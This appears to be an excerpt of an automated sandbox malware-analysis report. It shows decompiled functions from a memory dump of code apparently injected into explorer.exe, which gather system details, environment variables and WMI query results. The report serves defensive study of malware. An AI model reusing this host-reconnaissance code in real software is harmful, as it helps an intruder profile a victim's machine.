        Uniqueness Score: -1.00%

        Function 000CA77D, Relevance: 1.3, APIs: 1, Instructions: 29COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000CA77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E000CA5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E000CA65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








        0x000ca786
        0x000ca787
        0x000ca78c
        0x000ca790
        0x000ca79f
        0x000ca7a7
        0x000ca7b4
        0x00000000
        0x000ca7b7
        0x000ca7ab
        0x00000000
        0x000ca7ab
        0x00000000

        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
        • Instruction ID: 530dcad075266c1156e77377669d94ddcef453a396c3f42a45d0ff379d1e2d4c
        • Opcode Fuzzy Hash: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
        • Instruction Fuzzy Hash: 55E09B3530861D6B8B2157A8AC50E9E3765AF4A77C7114716FD258F2D1CA30D84042D2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CB337, Relevance: 1.3, APIs: 1, Instructions: 25COMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E000CB337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0xde684; // 0x280f8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0xde684; // 0x280f8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}








        0x000cb337
        0x000cb33f
        0x000cb344
        0x000cb34a
        0x000cb34e
        0x000cb350
        0x000cb355
        0x000cb35e
        0x000cb362
        0x000cb362
        0x000cb36a
        0x00000000
        0x000cb36d
        0x000cb371

        APIs
        • CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
        • Instruction ID: 952f55d8802c1bf5a37f67cca09105c85e7c47fe1d2e413aeb41e2f7cc7b4704
        • Opcode Fuzzy Hash: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
        • Instruction Fuzzy Hash: B2E04F32301160ABD6606B69EC8CF6B7BA9FB99A91F06016DF905CB151CB24C802C7B1
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 000CD01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282COMMON
        Download Yara Rule
        C-Code - Quality: 86%
        			E000CD01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0xde69c; // 0x10000000
				_t81 = E000C8604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0xde684; // 0x280f8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E000D2301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E000C8FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E000CBA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E000CBB8D( *_t88) == 0) {
					_t90 = E000CBA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E000CE3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E000CE3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0xde68c; // 0x280fab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0xde694; // 0x280fa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E000C8FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E000CB7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E000CB67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E000C8FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E000CD400(_t43, E000CC379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E000CB88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E000CBBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0xde684; // 0x280f8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000C95E1(_t199, 0x10c);
				_t200 =  *0xde684; // 0x280f8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0xde684; // 0x280f8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000C85D5( &_v8);
				_t124 =  *0xde684; // 0x280f8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E000C9640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0xde684; // 0x280f8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0xde684; // 0x280f8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0xde684; // 0x280f8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0xde684; // 0x280f8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0xde684; // 0x280f8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0xde684; // 0x280f8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E000D2301(E000CD400(_t75, E000CC379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000D22D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E000C902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E000CCD33(_t79);
				return _t222;
			}



















































        0x000cd01f
        0x000cd029
        0x000cd035
        0x000cd03a
        0x000cd03f
        0x000cd3ff
        0x000cd3ff
        0x000cd04c
        0x000cd052
        0x000cd057
        0x000cd05d
        0x000cd06d
        0x000cd079
        0x000cd079
        0x000cd082
        0x000cd088
        0x000cd08a
        0x000cd093
        0x000cd093
        0x000cd09f
        0x000cd0a3
        0x000cd0a8
        0x000cd0ae
        0x000cd0b7
        0x000cd0c5
        0x000cd0cc
        0x000cd0d1
        0x000cd0d1
        0x000cd0d2
        0x000cd0b9
        0x000cd0b9
        0x000cd0b9
        0x000cd0d8
        0x000cd0e3
        0x000cd0f1
        0x000cd0f7
        0x000cd0fb
        0x000cd101
        0x000cd108
        0x000cd10f
        0x000cd113
        0x000cd11a
        0x000cd11b
        0x000cd128
        0x000cd12a
        0x000cd12f
        0x000cd13c
        0x000cd13e
        0x000cd13e
        0x000cd140
        0x000cd14a
        0x000cd156
        0x000cd166
        0x000cd16c
        0x000cd172
        0x000cd174
        0x000cd185
        0x000cd18b
        0x000cd191
        0x000cd196
        0x000cd19c
        0x000cd1a2
        0x000cd1a7
        0x000cd1ac
        0x000cd1ac
        0x000cd1b2
        0x000cd1b2
        0x000cd1bb
        0x000cd1c7
        0x000cd1cf
        0x000cd1d3
        0x000cd1d3
        0x000cd1cf
        0x000cd1d7
        0x000cd1dd
        0x000cd1e3
        0x000cd1ea
        0x000cd1fb
        0x000cd201
        0x000cd209
        0x000cd210
        0x000cd223
        0x000cd229
        0x000cd22e
        0x000cd231
        0x000cd234
        0x000cd23a
        0x000cd240
        0x000cd242
        0x000cd248
        0x000cd251
        0x000cd254
        0x000cd254
        0x000cd257
        0x000cd25f
        0x000cd26a
        0x000cd270
        0x000cd261
        0x000cd263
        0x000cd263
        0x000cd279
        0x000cd279
        0x000cd27f
        0x000cd287
        0x000cd292
        0x000cd297
        0x000cd29d
        0x000cd29f
        0x000cd2ac
        0x000cd2ad
        0x000cd2ae
        0x000cd2b9
        0x000cd2bb
        0x000cd2c2
        0x000cd2c2
        0x000cd2cc
        0x000cd2d1
        0x000cd2d6
        0x000cd2d6
        0x000cd2dc
        0x000cd2e3
        0x000cd2e4
        0x000cd2f1
        0x000cd304
        0x000cd309
        0x000cd30e
        0x000cd317
        0x000cd317
        0x000cd31d
        0x000cd322
        0x000cd328
        0x000cd32e
        0x000cd333
        0x000cd33c
        0x000cd33e
        0x000cd345
        0x000cd345
        0x000cd34b
        0x000cd353
        0x000cd358
        0x000cd359
        0x000cd35e
        0x000cd367
        0x000cd369
        0x000cd374
        0x000cd374
        0x000cd37d
        0x000cd385
        0x000cd38c
        0x000cd391
        0x000cd3a0
        0x000cd3b8
        0x000cd3bf
        0x000cd3cd
        0x000cd3df
        0x000cd3e6
        0x000cd3f3
        0x00000000

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • GetCurrentProcessId.KERNEL32 ref: 000CD046
        • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 000CD082
        • GetCurrentProcess.KERNEL32 ref: 000CD09F
        • GetLastError.KERNEL32 ref: 000CD13E
        • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 000CD16C
        • GetLastError.KERNEL32 ref: 000CD172
        • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 000CD1C7
        • GetCurrentProcess.KERNEL32 ref: 000CD20E
        • memset.MSVCRT ref: 000CD229
        • GetVersionExA.KERNEL32(00000000), ref: 000CD234
        • GetCurrentProcess.KERNEL32(00000100), ref: 000CD24E
        • GetSystemInfo.KERNEL32(?), ref: 000CD26A
        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 000CD287
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
        • API String ID: 3876402152-2706916422
        • Opcode ID: 4af17ca78047f5755655550a5f9ec8d45349bfa14e1532cc1a67cc79d32b533b
        • Instruction ID: bb5fc8c38e6f26cdcc8b067c3c65418d8cefabbea5c8d39083ed8debe4d40b99
        • Opcode Fuzzy Hash: 4af17ca78047f5755655550a5f9ec8d45349bfa14e1532cc1a67cc79d32b533b
        • Instruction Fuzzy Hash: A1B14C71600744ABE710EB74DD89FEE77E8EF58340F00446EF95AD7292EB74AA448B21
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CDB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 50%
        			E000CDB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E000CD523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E000C8604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E000C861A( &_v60, 0xfffffffe);
					E000CD5D7( &_v104);
					return _t320;
				}
				_t165 = E000C95E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000C95E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000C92E5(_t165);
				_v60 = _t322;
				E000C85D5( &_v52);
				E000C85D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000C95E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000C85D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E000C861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000C91E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000C91E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E000C8698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E000C8604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E000C861A(_t136, 0);
								E000C861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000C91E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000C95E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000C95E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000C85D5( &_v92);
											E000C85D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E000C9640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000C95E1(_t283, 0x219);
										E000C9640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000C85D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000C91E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E000CDA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E000C861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































        0x000cdb45
        0x000cdb4b
        0x000cdb52
        0x000cdb55
        0x000cdb58
        0x000cdb5d
        0x000cdb5f
        0x000cdb64
        0x000cdfac
        0x000cdfac
        0x000cdb71
        0x000cdb73
        0x000cdb76
        0x000cdb79
        0x000cdf91
        0x000cdf97
        0x000cdfa1
        0x00000000
        0x000cdfa6
        0x000cdb84
        0x000cdb8b
        0x000cdb92
        0x000cdb95
        0x000cdb9a
        0x000cdb9c
        0x000cdb9f
        0x000cdba2
        0x000cdba3
        0x000cdbac
        0x000cdbb2
        0x000cdbb5
        0x000cdbbe
        0x000cdbc3
        0x000cdbc8
        0x000cdbdf
        0x000cdbec
        0x000cdbef
        0x000cdbf6
        0x000cdbfb
        0x000cdc02
        0x000cdc07
        0x000cdc0e
        0x000cdc10
        0x000cdc1c
        0x000cdc1f
        0x000cdc21
        0x000cdf81
        0x000cdf82
        0x000cdf8b
        0x00000000
        0x000cdf8b
        0x000cdc27
        0x000cdc2a
        0x000cdc2d
        0x000cdc30
        0x000cdc32
        0x000cdf4d
        0x000cdf50
        0x000cdf53
        0x000cdf55
        0x000cdf77
        0x000cdf7c
        0x000cdf57
        0x000cdf5a
        0x000cdf65
        0x000cdf6c
        0x000cdf6c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000cdc38
        0x000cdc38
        0x000cdc4a
        0x000cdc4d
        0x000cdc4f
        0x00000000
        0x00000000
        0x000cdc57
        0x000cdc5a
        0x000cdc5d
        0x000cdc60
        0x000cdc63
        0x000cdc66
        0x00000000
        0x00000000
        0x000cdc6c
        0x000cdc7a
        0x000cdc7d
        0x000cdc7f
        0x000cdc98
        0x000cdca7
        0x000cdcaf
        0x000cdcaf
        0x000cdcb2
        0x000cdcb9
        0x000cdcbd
        0x000cdcc3
        0x000cdcc5
        0x000cdf35
        0x000cdf3b
        0x000cdf41
        0x000cdf44
        0x000cdf44
        0x00000000
        0x000cdf44
        0x000cdcd4
        0x000cdce8
        0x000cdcec
        0x000cdcee
        0x000cdcf3
        0x000cdf02
        0x000cdf08
        0x000cdf13
        0x000cdf1e
        0x000cdf24
        0x000cdf2a
        0x000cdf2d
        0x00000000
        0x000cdf2d
        0x000cdcf9
        0x000cded0
        0x000cded0
        0x000cded3
        0x000cded6
        0x00000000
        0x00000000
        0x000cdd01
        0x000cdd09
        0x000cdd10
        0x000cdd16
        0x000cdd18
        0x00000000
        0x00000000
        0x000cdd21
        0x000cdd36
        0x000cdd3c
        0x000cdd45
        0x000cdd48
        0x000cdd4b
        0x000cdd4d
        0x000cdec3
        0x000cdec6
        0x000cdecf
        0x000cdecf
        0x00000000
        0x000cdecf
        0x000cdd5d
        0x000cdd60
        0x000cdd67
        0x000cdd6d
        0x000cdd70
        0x000cdd73
        0x000cdd76
        0x000cdd79
        0x000cddb5
        0x000cddb5
        0x000cddb8
        0x000cde64
        0x000cde78
        0x000cde88
        0x000cde8c
        0x000cde8e
        0x000cdea5
        0x000cdea9
        0x000cdeb2
        0x000cdebd
        0x00000000
        0x000cdebd
        0x000cde94
        0x000cde95
        0x000cde9a
        0x000cde9a
        0x000cde9c
        0x000cde9d
        0x000cdea2
        0x00000000
        0x000cdea2
        0x000cddbe
        0x000cddbe
        0x000cddc1
        0x000cde2c
        0x000cde40
        0x000cde50
        0x000cde54
        0x000cde56
        0x00000000
        0x00000000
        0x000cde5c
        0x000cde5d
        0x00000000
        0x000cde5d
        0x000cddc3
        0x000cddc3
        0x000cddc6
        0x00000000
        0x00000000
        0x000cddc8
        0x000cddcb
        0x00000000
        0x00000000
        0x000cddcd
        0x000cddcd
        0x000cddd3
        0x000cddef
        0x000cddfe
        0x000cde07
        0x000cde0c
        0x000cde0f
        0x000cde15
        0x000cde15
        0x000cde1a
        0x000cde26
        0x00000000
        0x000cde26
        0x000cddd8
        0x00000000
        0x000cddd8
        0x000cdd7b
        0x000cdda2
        0x000cdda7
        0x000cddac
        0x000cddae
        0x000cddae
        0x00000000
        0x000cddac
        0x000cdd7d
        0x000cdd7d
        0x000cdd80
        0x00000000
        0x00000000
        0x000cdd86
        0x000cdd86
        0x000cdd89
        0x00000000
        0x00000000
        0x000cdd8f
        0x000cdd8f
        0x000cdd92
        0x00000000
        0x00000000
        0x000cdd98
        0x000cdd9b
        0x00000000
        0x00000000
        0x000cdd9d
        0x00000000
        0x000cdd9d
        0x000cdedf
        0x000cdee5
        0x000cdeeb
        0x000cdeee
        0x000cdef1
        0x000cdef1
        0x000cdef4
        0x000cdef5
        0x000cdef8
        0x000cdefa
        0x00000000
        0x00000000
        0x000cdf4a
        0x000cdf4a
        0x00000000
        0x000cdf4a
        0x000cdc81
        0x000cdc87
        0x00000000
        0x000cdc87
        0x000cdf47
        0x00000000
        0x000cdbca
        0x000cdbcf
        0x000cdbd4
        0x00000000
        0x000cdbd8

        APIs
          • Part of subcall function 000CD523: CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
          • Part of subcall function 000CD523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
